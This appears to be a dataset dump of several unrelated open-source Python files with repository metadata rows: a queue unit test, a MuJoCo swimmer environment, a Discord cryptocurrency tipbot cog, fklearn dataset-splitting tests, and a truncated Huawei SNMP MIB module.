queue = Queue(shape = (100,2), dtype = 'int16')
data = random.randint(1024, size=(5, 2))
self.assertEqual(queue.isempty, True)
queue.enqueue(data)
self.assertEqual(queue.length, 5)
self.assertEqual(queue.rear, 5)
self.assertEqual(queue.shape, (100,2))
self.assertEqual(queue.size, 100*2)
self.assertEqual(queue.dtype, 'int16')
self.assertEqual(queue.isfull, False)
self.assertEqual(queue.isempty, False)
def test_reshape(self):
queue = Queue(shape = (100,2), dtype = 'int16')
queue.reshape(shape = (50,2), dtype = 'float64')
self.assertEqual(queue.length, 0)
self.assertEqual(queue.rear, 0)
self.assertEqual(queue.shape, (50,2))
self.assertEqual(queue.size, 50*2)
self.assertEqual(queue.dtype, 'float64')
| 33.80597 | 118 | 0.638852 | 297 | 2,265 | 4.814815 | 0.333333 | 0.188811 | 0.237762 | 0.088112 | 0.365035 | 0.282517 | 0.273427 | 0.160839 | 0.160839 | 0.160839 | 0 | 0.043144 | 0.25298 | 2,265 | 66 | 119 | 34.318182 | 0.802009 | 0.186755 | 0 | 0.386364 | 0 | 0 | 0.016628 | 0 | 0 | 0 | 0 | 0 | 0.431818 | 1 | 0.090909 | false | 0 | 0.227273 | 0 | 0.340909 | 0.022727 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1ef6f3ef3adc8a7a5eac9bad221a2ca468d9827c | 600 | py | Python | src/metaworlds/envs/mujoco/hill/swimmer3d_hill_env.py | rlworkgroup/metaworlds | be03cfed9890a37b84283c597209b849e8a086cc | [
"MIT"
] | 5 | 2019-02-27T20:55:30.000Z | 2019-08-24T19:24:41.000Z | src/metaworlds/envs/mujoco/hill/swimmer3d_hill_env.py | rlworkgroup/metaworlds | be03cfed9890a37b84283c597209b849e8a086cc | [
"MIT"
] | 8 | 2019-02-28T04:07:10.000Z | 2020-01-02T10:54:10.000Z | src/metaworlds/envs/mujoco/hill/swimmer3d_hill_env.py | rlworkgroup/metaworlds | be03cfed9890a37b84283c597209b849e8a086cc | [
"MIT"
] | 1 | 2021-09-13T18:35:34.000Z | 2021-09-13T18:35:34.000Z | import gym
import numpy as np
from metaworlds.envs.mujoco import Swimmer3DEnv
from metaworlds.envs.mujoco.hill import HillEnv
from metaworlds.envs.mujoco.hill import terrain
from metaworlds.misc.overrides import overrides
class Swimmer3DHillEnv(HillEnv):
MODEL_CLASS = Swimmer3DEnv
@overrides
def _mod_hfield(self, hfield):
# clear a flat patch for the robot to start off from
return terrain.clear_patch(
hfield,
gym.spaces.Box(
np.array([-3.0, -1.5]),
np.array([0.0, -0.5]),
dtype=np.float32))
| 26.086957 | 60 | 0.653333 | 78 | 600 | 4.974359 | 0.538462 | 0.14433 | 0.139175 | 0.185567 | 0.175258 | 0.175258 | 0 | 0 | 0 | 0 | 0 | 0.029345 | 0.261667 | 600 | 22 | 61 | 27.272727 | 0.846501 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.375 | 0.0625 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
480af7af3652c8750c3fafdaec5670c31e2395bb | 9,512 | py | Python | tip.py | umbru/discord-tipbot | 676db892035bcf20213677c3e7a740a9ec29ab8d | [
"MIT"
] | null | null | null | tip.py | umbru/discord-tipbot | 676db892035bcf20213677c3e7a740a9ec29ab8d | [
"MIT"
] | 1 | 2019-11-04T04:25:06.000Z | 2019-11-04T08:44:14.000Z | tip.py | umbru/discord-tipbot | 676db892035bcf20213677c3e7a740a9ec29ab8d | [
"MIT"
] | 2 | 2019-11-03T10:31:09.000Z | 2020-11-21T17:37:26.000Z | from bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
from decimal import Decimal
import discord
from discord.ext import commands
import user_db
import config
rpc_connection = 'http://{0}:{1}@{2}:{3}'.format(config.rpc_user, config.rpc_password, config.ip, config.rpc_port)
def str_isfloat(str):
try:
float(str)
return True
except ValueError:
return False
class Tip(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def tip(self, ctx, mention=None, amount=None):
client = AuthServiceProxy(rpc_connection)
user_id = str(ctx.author.id)
user_name = ctx.author.name
if not user_db.check_user(user_id):
user_db.add_user(user_id, user_name)
embed = discord.Embed(
title="**How may I be of service?**",
color=0x7152b6)
embed.set_author(
name=ctx.author.display_name,
icon_url=ctx.author.avatar_url_as(format='png', size=256))
embed.add_field(
name="To see all my available commands type `!help`",
value="If you have any issues please let one of the team know.")
embed.set_thumbnail(url=self.bot.user.avatar_url_as(format='png', size=1024))
embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
await ctx.channel.send(embed=embed)
else:
pass
if mention is None or amount is None:
embed = discord.Embed(color=0xffd800)
embed.set_author(
name=ctx.author.display_name,
icon_url=ctx.author.avatar_url_as(format='png', size=256))
embed.add_field(
name="No user or amount specified. Please check **!help** for information.",
value=" :warning: :warning: :warning: ")
embed.set_footer(
text="TipBot v{0}]".format(config.VERSION),
icon_url=self.bot.user.avatar_url_as(format='png', size=256))
await ctx.channel.send(embed=embed)
elif not str_isfloat(amount):
embed = discord.Embed(color=0xff0000)
embed.set_author(
name=ctx.author.display_name,
icon_url=ctx.author.avatar_url_as(format='png', size=256))
embed.add_field(
name="Invalid tip amount. Please check **!help** for information.",
value="`{0}`".format(amount))
embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
await ctx.channel.send(embed=embed)
else:
pass
tipfrom = str(ctx.author.id)
tipto = str(mention.replace('<@','').replace('>',''))
amount = Decimal(str(float(amount)))
if amount < Decimal('0.01'):
embed = discord.Embed(color=0xff0000)
embed.set_author(
name=ctx.author.display_name,
icon_url=ctx.author.avatar_url_as(format='png', size=256))
embed.add_field(
name="Tip amount must be atleast 0.01 UMBRU",
value="`{0}`".format(amount))
embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
await ctx.channel.send(embed=embed)
else:
if len(tipto) != 18 and len(tipto) != 17:
embed = discord.Embed(color=0xff0000)
embed.set_author(
name=ctx.author.display_name,
icon_url=ctx.author.avatar_url_as(format='png', size=256))
embed.add_field(
name="Invalid User. Please check **!help** for information.",
value="`{0}`".format(str(mention)))
embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
await ctx.channel.send(embed=embed)
elif tipfrom == tipto:
embed = discord.Embed(color=0xff0000)
embed.set_author(
name=ctx.author.display_name,
icon_url=ctx.author.avatar_url_as(format='png', size=256))
embed.add_field(
name="Sorry you cannot tip yourself!",
value=" :wink: ")
embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
await ctx.channel.send(embed=embed)
elif amount > client.getbalance(tipfrom, config.CONFIRM):
embed = discord.Embed(color=0xff0000)
embed.set_author(
name=ctx.author.display_name,
icon_url=ctx.author.avatar_url_as(format='png', size=256))
embed.add_field(
name="Sorry you do not have enough UMBRU for that.",
value="Your balance is: **{0} UMBRU**".format(client.getbalance(tipfrom, config.CONFIRM)))
embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
await ctx.channel.send(embed=embed)
else:
if tipto == str(self.bot.user.id):
try:
move_istrue = client.move(tipfrom, 'tipbot_wallet', float(amount))
except:
embed = discord.Embed(color=0xff0000)
embed.set_author(
name=ctx.author.display_name,
icon_url=ctx.author.avatar_url_as(format='png', size=256))
embed.add_field(
name="Invalid tip amount. Please check **!help** for information.",
value="`{0}`".format(amount))
embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
await ctx.channel.send(embed=embed)
if move_istrue:
embed = discord.Embed(color=0x7152b6)
embed.set_author(
name=ctx.author.display_name,
icon_url=ctx.author.avatar_url_as(format='png', size=256))
embed.add_field(
name="Thank you for the donation!",
value="**{0} UMBRU**".format(amount))
embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
await ctx.channel.send(embed=embed)
else:
try:
move_istrue = client.move(tipfrom, tipto, float(amount))
except:
embed = discord.Embed(color=0xff0000)
embed.set_author(
name=ctx.author.display_name,
icon_url=ctx.author.avatar_url_as(format='png', size=256))
embed.add_field(
name="Invalid tip amount. Please check **!help** for information.",
value="`{0}`".format(amount))
embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
await ctx.channel.send(embed=embed)
if move_istrue:
embed = discord.Embed(color=0x7152b6)
embed.set_author(
name=ctx.author.display_name,
icon_url=ctx.author.avatar_url_as(format='png', size=256))
embed.add_field(
name="{0} has tipped {1} `{2} UMBRU`".format(ctx.author.display_name,
self.bot.get_user(int(tipto)).display_name,
amount),
value="Spend it wisely!")
embed.set_footer(text="TipBot v{0}".format(config.VERSION), icon_url=self.bot.user.avatar_url_as(format='png', size=256))
await ctx.channel.send(embed=embed)
def setup(bot):
bot.add_cog(Tip(bot)) | 53.740113 | 153 | 0.488436 | 1,001 | 9,512 | 4.498502 | 0.14985 | 0.051965 | 0.056185 | 0.086831 | 0.72374 | 0.72374 | 0.686875 | 0.686875 | 0.67777 | 0.67777 | 0 | 0.028607 | 0.404647 | 9,512 | 177 | 154 | 53.740113 | 0.766555 | 0 | 0 | 0.608974 | 0 | 0 | 0.099968 | 0 | 0 | 0 | 0.009251 | 0 | 0 | 1 | 0.019231 | false | 0.019231 | 0.038462 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
481bdfbc9af2d8828c835c81b26e78c7c7419e64 | 11,757 | py | Python | tests/preprocessing/test_splitting.py | diegoarri91/fklearn | d240e6605a515ee446f34c5ddb9778dc16562056 | [
"Apache-2.0"
] | null | null | null | tests/preprocessing/test_splitting.py | diegoarri91/fklearn | d240e6605a515ee446f34c5ddb9778dc16562056 | [
"Apache-2.0"
] | null | null | null | tests/preprocessing/test_splitting.py | diegoarri91/fklearn | d240e6605a515ee446f34c5ddb9778dc16562056 | [
"Apache-2.0"
] | null | null | null | from collections import Counter
import hypothesis.strategies as st
import pandas as pd
from hypothesis import given
from hypothesis.extra.pandas import columns, data_frames, range_indexes
from pandas.testing import assert_frame_equal
from fklearn.preprocessing.splitting import space_time_split_dataset, time_split_dataset, stratified_split_dataset
df = pd.DataFrame(
{
'space': ['space1', 'space2', 'space1', 'space2', 'space1', 'space2'],
'time': [pd.to_datetime("2016-10-01"), pd.to_datetime("2016-10-01"), pd.to_datetime("2016-11-01"),
pd.to_datetime("2016-11-01"), pd.to_datetime("2016-12-01"), pd.to_datetime("2016-12-01")]
}
)
df_with_new_id = pd.DataFrame(
{
'space': ['space1', 'space2', 'space1', 'space2', 'space1', 'space2', 'space3'],
'time': [pd.to_datetime("2016-10-01"), pd.to_datetime("2016-10-01"), pd.to_datetime("2016-11-01"),
pd.to_datetime("2016-11-01"), pd.to_datetime("2016-12-01"), pd.to_datetime("2016-12-01"),
pd.to_datetime("2016-11-01")]
}
)
df_only_one_point_per_id = pd.DataFrame(
{
'space': ['space1', 'space2', 'space3', 'space4'],
'time': [pd.to_datetime("2016-10-01"), pd.to_datetime("2016-10-01"), pd.to_datetime("2016-11-01"),
pd.to_datetime("2016-11-01")]
}
)
MAX_STRATIFIED_SPLIT_SIZE_DIFFERENCE = 1
def test_time_split_dataset(test_df=df):
in_time_train_set, out_time_test_set = time_split_dataset(dataset=test_df,
train_start_date="2016-10-01",
train_end_date="2016-11-01",
holdout_end_date="2016-12-01",
time_column="time")
expected_train = pd.DataFrame(
{
'space': ['space1', 'space2'],
'time': [pd.to_datetime("2016-10-01"), pd.to_datetime("2016-10-01")]
}
)
expected_test = pd.DataFrame({
'space': ['space1', 'space2'],
'time': [pd.to_datetime("2016-11-01"), pd.to_datetime("2016-11-01")]
})
assert in_time_train_set.reset_index(drop=True).equals(expected_train)
assert out_time_test_set.reset_index(drop=True).equals(expected_test)
# Testing optional argument `holdout_start_date`
in_time_train_set, out_time_test_set = time_split_dataset(dataset=test_df,
train_start_date="2016-10-01",
train_end_date="2016-11-01",
holdout_start_date="2016-11-03",
holdout_end_date="2017-01-01",
time_column="time")
expected_train = pd.DataFrame({
'space': ['space1', 'space2'],
'time': [pd.to_datetime("2016-10-01"), pd.to_datetime("2016-10-01")]
})
expected_test = pd.DataFrame({
'space': ['space1', 'space2'],
'time': [pd.to_datetime("2016-12-01"), pd.to_datetime("2016-12-01")]
})
assert in_time_train_set.reset_index(drop=True).equals(expected_train)
assert out_time_test_set.reset_index(drop=True).equals(expected_test)
def test_space_time_split_dataset(test_df=df,
test_df_with_new_id=df_with_new_id,
test_df_only_one_point_per_id=df_only_one_point_per_id):
train_set, intime_outspace_hdout, outtime_inspace_hdout, outtime_outspace_hdout = \
space_time_split_dataset(dataset=test_df,
train_start_date="2016-10-01",
train_end_date="2016-11-01",
holdout_end_date="2016-12-01",
split_seed=1,
space_holdout_percentage=0.5,
space_column="space",
time_column="time")
expected_train = pd.DataFrame({
'space': ['space2'],
'time': [pd.to_datetime("2016-10-01")]
})
expected_intime_outspace_holdout = pd.DataFrame({
'space': ['space1'],
'time': [pd.to_datetime("2016-10-01")]
})
expected_outtime_outspace_holdout = pd.DataFrame({
'space': ['space1'],
'time': [pd.to_datetime("2016-11-01")]
})
expected_outtime_inspace_holdout = pd.DataFrame({
'space': ['space2'],
'time': [pd.to_datetime("2016-11-01")]
})
assert train_set.reset_index(drop=True).equals(expected_train)
assert intime_outspace_hdout.reset_index(drop=True).equals(expected_intime_outspace_holdout)
assert outtime_inspace_hdout.reset_index(drop=True).equals(expected_outtime_inspace_holdout)
assert outtime_outspace_hdout.reset_index(drop=True).equals(expected_outtime_outspace_holdout)
# Testing optional argument `holdout_start_date`
train_set, intime_outspace_hdout, outtime_inspace_hdout, outtime_outspace_hdout = \
space_time_split_dataset(dataset=test_df,
train_start_date="2016-10-01",
train_end_date="2016-11-01",
holdout_start_date="2016-12-01",
holdout_end_date="2017-01-01",
split_seed=1,
space_holdout_percentage=0.5,
space_column="space",
time_column="time")
expected_train = pd.DataFrame({
'space': ['space2'],
'time': [pd.to_datetime("2016-10-01")]
})
expected_intime_outspace_holdout = pd.DataFrame({
'space': ['space1'],
'time': [pd.to_datetime("2016-10-01")]
})
expected_outtime_outspace_holdout = pd.DataFrame({
'space': ['space1'],
'time': [pd.to_datetime("2016-12-01")]
})
expected_outtime_inspace_holdout = pd.DataFrame({
'space': ['space2'],
'time': [pd.to_datetime("2016-12-01")]
})
assert train_set.reset_index(drop=True).equals(expected_train)
assert intime_outspace_hdout.reset_index(drop=True).equals(expected_intime_outspace_holdout)
assert outtime_inspace_hdout.reset_index(drop=True).equals(expected_outtime_inspace_holdout)
assert outtime_outspace_hdout.reset_index(drop=True).equals(expected_outtime_outspace_holdout)
# Testing new space id appearing in the holdout period
train_set, intime_outspace_hdout, outtime_inspace_hdout, outtime_outspace_hdout = \
space_time_split_dataset(dataset=test_df_with_new_id,
train_start_date="2016-10-01",
train_end_date="2016-11-01",
holdout_end_date="2016-12-01",
split_seed=1,
space_holdout_percentage=0.5,
space_column="space",
time_column="time")
expected_train = pd.DataFrame({
'space': ['space2'],
'time': [pd.to_datetime("2016-10-01")]
})
expected_intime_outspace_holdout = pd.DataFrame({
'space': ['space1'],
'time': [pd.to_datetime("2016-10-01")]
})
expected_outtime_outspace_holdout = pd.DataFrame({
'space': ['space1', 'space3'],
'time': [pd.to_datetime("2016-11-01"), pd.to_datetime("2016-11-01")]
})
expected_outtime_inspace_holdout = pd.DataFrame({
'space': ['space2'],
'time': [pd.to_datetime("2016-11-01")]
})
assert train_set.reset_index(drop=True).equals(expected_train)
assert intime_outspace_hdout.reset_index(drop=True).equals(expected_intime_outspace_holdout)
assert outtime_inspace_hdout.reset_index(drop=True).equals(expected_outtime_inspace_holdout)
assert outtime_outspace_hdout.reset_index(drop=True).equals(expected_outtime_outspace_holdout)
# Testing only one point per space id
train_set, intime_outspace_hdout, outtime_inspace_hdout, outtime_outspace_hdout = \
space_time_split_dataset(dataset=test_df_only_one_point_per_id,
train_start_date="2016-10-01",
train_end_date="2016-11-01",
holdout_end_date="2016-12-01",
split_seed=1,
space_holdout_percentage=0.5,
space_column="space",
time_column="time")
expected_train = pd.DataFrame({
'space': ['space2'],
'time': [pd.to_datetime("2016-10-01")]
})
expected_intime_outspace_holdout = pd.DataFrame({
'space': ['space1'],
'time': [pd.to_datetime("2016-10-01")]
})
expected_outtime_outspace_holdout = pd.DataFrame({
'space': ['space3', 'space4'],
'time': [pd.to_datetime("2016-11-01"), pd.to_datetime("2016-11-01")]
})
assert train_set.reset_index(drop=True).equals(expected_train)
assert intime_outspace_hdout.reset_index(drop=True).equals(expected_intime_outspace_holdout)
assert outtime_inspace_hdout.empty
assert outtime_outspace_hdout.reset_index(drop=True).equals(expected_outtime_outspace_holdout)
@st.composite
def gen_stratified_test_data(draw):
column_name_strategy = st.text(st.characters(whitelist_categories=["Lu", "Ll"]), min_size=3)
all_column_names = draw(st.lists(column_name_strategy, min_size=3, max_size=6, unique=True))
target_column_name = all_column_names[-1]
column_strategies = columns(all_column_names, dtype=int)
data_set = draw(data_frames(column_strategies, index=range_indexes(min_size=50, max_size=100)))
num_classes = draw(st.integers(min_value=2, max_value=5))
data_set[target_column_name] = [i % num_classes for i in range(len(data_set))]
return data_set, target_column_name, num_classes
def assert_sample_size_per_class(data, target_column_name, expected_samples_per_class):
count_per_class = Counter(data[target_column_name]).values()
for count in count_per_class:
assert abs(count - expected_samples_per_class) <= MAX_STRATIFIED_SPLIT_SIZE_DIFFERENCE
@given(sample=gen_stratified_test_data(),
random_state=st.integers(min_value=0, max_value=100),
test_size=st.floats(min_value=0.2, max_value=0.8))
def test_stratified_split_dataset(sample, random_state, test_size):
expected_data, target_column_name, num_classes = sample
train_data, test_data = stratified_split_dataset(expected_data, target_column_name, test_size=test_size,
random_state=random_state)
total_samples = len(expected_data)
expected_test_size = int(total_samples * test_size)
expected_train_size = total_samples - expected_test_size
expected_test_samples_per_class = expected_test_size / num_classes
expected_train_samples_per_class = expected_train_size / num_classes
data = pd.concat([train_data, test_data])
assert abs(len(train_data) - expected_train_size) <= MAX_STRATIFIED_SPLIT_SIZE_DIFFERENCE
assert abs(len(test_data) - expected_test_size) <= MAX_STRATIFIED_SPLIT_SIZE_DIFFERENCE
assert_frame_equal(data, expected_data, check_like=True)
assert_sample_size_per_class(train_data, target_column_name, expected_train_samples_per_class)
assert_sample_size_per_class(test_data, target_column_name, expected_test_samples_per_class)
| 41.989286 | 114 | 0.618695 | 1,425 | 11,757 | 4.73614 | 0.093333 | 0.024893 | 0.074678 | 0.09957 | 0.780264 | 0.712402 | 0.679804 | 0.654764 | 0.654467 | 0.640836 | 0 | 0.066003 | 0.265459 | 11,757 | 279 | 115 | 42.139785 | 0.715493 | 0.01548 | 0 | 0.65566 | 0 | 0 | 0.096629 | 0 | 0 | 0 | 0 | 0 | 0.132075 | 1 | 0.023585 | false | 0 | 0.033019 | 0 | 0.061321 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
483b21ad08b30ea5943694f13065a024d57d2972 | 16,637 | py | Python | pysnmp-with-texts/HUAWEI-DATASYNC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/HUAWEI-DATASYNC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/HUAWEI-DATASYNC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module HUAWEI-DATASYNC-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/HUAWEI-DATASYNC-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:43:58 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsUnion, ValueSizeConstraint, ValueRangeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsUnion", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsIntersection")
hwDatacomm, = mibBuilder.importSymbols("HUAWEI-MIB", "hwDatacomm")
NotificationGroup, ModuleCompliance, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance", "ObjectGroup")
Integer32, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter32, Unsigned32, Counter64, MibIdentifier, NotificationType, Gauge32, IpAddress, ModuleIdentity, iso, Bits, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter32", "Unsigned32", "Counter64", "MibIdentifier", "NotificationType", "Gauge32", "IpAddress", "ModuleIdentity", "iso", "Bits", "ObjectIdentity")
RowStatus, TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "RowStatus", "TextualConvention", "DisplayString")
hwDataSync = ModuleIdentity((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191))
hwDataSync.setRevisions(('2015-07-16 13:49', '2014-09-04 17:10', '2009-03-17 10:27',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: hwDataSync.setRevisionsDescriptions(('Add hwCfgLastSaveFailNotify .', 'The MIB module for Data sync between host and netmanager.', 'The initial revision of this MIB module .',))
if mibBuilder.loadTexts: hwDataSync.setLastUpdated('201507161349Z')
if mibBuilder.loadTexts: hwDataSync.setOrganization('Huawei Technologies Co.,Ltd.')
if mibBuilder.loadTexts: hwDataSync.setContactInfo("Huawei Industrial Base Bantian, Longgang Shenzhen 518129 People's Republic of China Website: http://www.huawei.com Email: support@huawei.com ")
if mibBuilder.loadTexts: hwDataSync.setDescription('Modified hwCfgChgTerminalID.')
class DateAndTime(TextualConvention, OctetString):
description = "A date-time specification. field octets contents range ----- ------ -------- ----- 1 1-2 year* 0..65536 2 3 month 1..12 3 4 day 1..31 4 5 hour 0..23 5 6 minutes 0..59 6 7 seconds 0..60 (use 60 for leap-second) 7 8 deci-seconds 0..9 8 9 direction from UTC '+' / '-' 9 10 hours from UTC* 0..13 10 11 minutes from UTC 0..59 * Notes: - the value of year is in network-byte order - daylight saving time in New Zealand is +13 For example, Tuesday May 26, 1992 at 1:30:15 PM EDT would be displayed as: 1992-5-26,13:30:15.0,-4:0 Note that if only local time is known, then timezone information (fields 8-10) is not present."
status = 'current'
displayHint = '2d-1d-1d,1d:1d:1d.1d,1a1d:1d'
subtypeSpec = OctetString.subtypeSpec + ConstraintsUnion(ValueSizeConstraint(8, 8), ValueSizeConstraint(11, 11), )
hwDataSyncScalarObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 1))
hwDataSyncTableObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2))
hwDataSyncNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 3))
hwDataSyncConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 4))
hwCurrentCfgChgSeqID = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCurrentCfgChgSeqID.setStatus('current')
if mibBuilder.loadTexts: hwCurrentCfgChgSeqID.setDescription('The value of this object identifies the ID of the current configuration change. The value ranges from 0 to 65535. After the ID of the configuration change reaches the maximum value, the value of the ID starts from 1 again. After the device is restarted, the value of the ID becomes 0.')
hwCfgChgSeqIDReveralCount = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgSeqIDReveralCount.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgSeqIDReveralCount.setDescription('The value of this object identifies the cycle count of the index of configuration change table.')
hwCfgChgTableMaxItem = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgTableMaxItem.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgTableMaxItem.setDescription('The value of this object identifies the maximum number of entries in hwCfgChgTable. ')
hwCfgBaselineTime = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 20))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgBaselineTime.setStatus('current')
if mibBuilder.loadTexts: hwCfgBaselineTime.setDescription('Specifies the time of system confiuration was baseline.')
hwDataSyncGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 4, 1))
hwDataSyncScalarObjectsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 4, 1, 1)).setObjects(("HUAWEI-DATASYNC-MIB", "hwCurrentCfgChgSeqID"), ("HUAWEI-DATASYNC-MIB", "hwCfgChgSeqIDReveralCount"), ("HUAWEI-DATASYNC-MIB", "hwCfgChgTableMaxItem"), ("HUAWEI-DATASYNC-MIB", "hwCfgBaselineTime"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwDataSyncScalarObjectsGroup = hwDataSyncScalarObjectsGroup.setStatus('current')
if mibBuilder.loadTexts: hwDataSyncScalarObjectsGroup.setDescription('A collection of objects on DataSync ScalarObjects Information.')
hwCfgChgNotifyGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 4, 1, 2)).setObjects(("HUAWEI-DATASYNC-MIB", "hwCfgChgNotify"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwCfgChgNotifyGroup = hwCfgChgNotifyGroup.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgNotifyGroup.setDescription('A collection of objects on Configuration Change Information.')
hwDataSyncNotifyGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 4, 1, 3)).setObjects(("HUAWEI-DATASYNC-MIB", "hwCfgLastSaveFailNotify"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwDataSyncNotifyGroup = hwDataSyncNotifyGroup.setStatus('current')
if mibBuilder.loadTexts: hwDataSyncNotifyGroup.setDescription('A collection of objects on synchronization Configuration Notify Information.')
hwDataSyncCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 4, 2))
hwDataSyncCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 4, 2, 1)).setObjects()
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwDataSyncCompliance = hwDataSyncCompliance.setStatus('current')
if mibBuilder.loadTexts: hwDataSyncCompliance.setDescription('The compliance statement for entities that support the huawei DataSync MIB.')
hwCfgChgTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1), )
if mibBuilder.loadTexts: hwCfgChgTable.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgTable.setDescription('This table is used to record configuration changes. In this table, you can find the configuration change based on the specific index.')
hwCfgChgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1), ).setIndexNames((0, "HUAWEI-DATASYNC-MIB", "hwCfgChgSeqID"))
if mibBuilder.loadTexts: hwCfgChgEntry.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgEntry.setDescription('Entry of hwCfgChgTable.')
